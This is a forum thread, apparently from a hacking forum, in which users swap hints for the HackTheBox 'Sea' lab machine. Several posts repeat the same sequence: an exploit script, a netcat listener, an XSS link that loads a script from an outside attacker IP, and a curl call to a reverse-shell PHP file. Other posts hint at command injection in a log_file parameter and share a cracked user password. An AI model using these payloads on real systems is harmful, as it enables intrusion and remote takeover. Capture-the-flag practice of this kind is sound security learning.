[HTB] Sea - Machine
by RedTeamer - Friday August 9, 2024 at 08:04 PM
#81
not able to decode the hash in bcrypt anyone help p[lz
Reply
#82
Any hits for command injection on root...

amay@sea:~$ curl http://127.0.0.1:8080

Unauthorized accessa
may@sea:~$
Reply
#83
(Aug 10, 2024, 11:21 PM)mhsoraa Wrote: Any hits for command injection on root...

amay@sea:~$ curl http://127.0.0.1:8080

Unauthorized accessa
may@sea:~$

use port forwarding to show website on localhost

(Aug 10, 2024, 11:21 PM)testerlion Wrote: not able to decode the hash in bcrypt anyone help p[lz

find escape character
Reply
#84
FOR ROOT:

on local machine forward the port 8080 by using:
Hidden Content
You must register or login to view this content.

then use burpsuit to intercept the request when analyzing log files.. u can inject code in the log_file param by using for example:
Hidden Content
You must register or login to view this content.

harmless example to avoid spoiling others experience!! ENJOY
Reply
#85
(Aug 10, 2024, 10:46 PM)kewlcat002 Wrote: Machine rooted feel free to DM me if need be

(Aug 10, 2024, 10:56 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:45 PM)OffensiveBias Wrote:
(Aug 10, 2024, 10:41 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:26 PM)Witcher09 Wrote: It is showing send the below link to admin, from where
 some one help me

python3 exploit.py http://sea.htb/ 10.10.xx.xxx xxxx

It willl then tell you 

nc -lvp xxxx
----------------------------

send the below link to admin:

----------------------------
http://sea.htb/"></form><script+src="http://10.10.14.128:8000/xss.js"></script><form+action="

send above to website column in contact.php, after this open another port and use this command curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.xx.xxx&lport=new_port'


thanks bro

Can you tell me what to do actually I found the daily cron but not able to get what to do
Reply
#86
(Aug 10, 2024, 11:27 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:46 PM)kewlcat002 Wrote: Machine rooted feel free to DM me if need be

(Aug 10, 2024, 10:56 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:45 PM)OffensiveBias Wrote:
(Aug 10, 2024, 10:41 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:26 PM)Witcher09 Wrote: It is showing send the below link to admin, from where
 some one help me

python3 exploit.py http://sea.htb/ 10.10.xx.xxx xxxx

It willl then tell you 

nc -lvp xxxx
----------------------------

send the below link to admin:

----------------------------
http://sea.htb/"></form><script+src="http://10.10.14.128:8000/xss.js"></script><form+action="

send above to website column in contact.php, after this open another port and use this command curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.xx.xxx&lport=new_port'


thanks bro

Can you tell me what to do actually I found the daily cron but not able to get what to do

Plenty of hints regarding the entire machine in the thread, just start from page 1
Reply
#87
any hints on foothold i found a page /contact.php it does call back my machine but i can't think of any thing to do with it
Reply
#88
(Aug 10, 2024, 11:27 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:46 PM)kewlcat002 Wrote: Machine rooted feel free to DM me if need be

(Aug 10, 2024, 10:56 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:45 PM)OffensiveBias Wrote:
(Aug 10, 2024, 10:41 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:26 PM)Witcher09 Wrote: It is showing send the below link to admin, from where
 some one help me

python3 exploit.py http://sea.htb/ 10.10.xx.xxx xxxx

It willl then tell you 

nc -lvp xxxx
----------------------------

send the below link to admin:

----------------------------
http://sea.htb/"></form><script+src="http://10.10.14.128:8000/xss.js"></script><form+action="

send above to website column in contact.php, after this open another port and use this command curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.xx.xxx&lport=new_port'


thanks bro

Can you tell me what to do actually I found the daily cron but not able to get what to do

Search for or ask chatgpt about command injection using curl and http://localhost:8080 is your way forward. Test for payloads to escape . Eventually you will find it.
Reply
#89
(Aug 10, 2024, 11:35 PM)elburro Wrote: any hints on foothold i found a page /contact.php  it does call back my machine but i can't  think of any thing to do with it

machine is slow, callback comes after some time and then repeats

I still can't find a usable command injection Undecided
"No suspicious traffic patterns detected in /root/flag.txt"

Finaly im root. Interesting box Smile
Reply
#90
I got into amay using password mychemicalromance but stuck to get into root. any hint?
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,170 1 hour ago
Last Post: kkkato
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 20 2,491 Yesterday, 11:06 PM
Last Post: op334
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 3 396 Yesterday, 10:36 PM
Last Post: op334
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 369 92,003 Yesterday, 04:10 PM
Last Post: sabbyahmed
  CBBH Write Ups hiddenhacker 22 6,226 Yesterday, 06:39 AM
Last Post: Usercomplex

Forum Jump:


 Users browsing this forum: 1 Guest(s)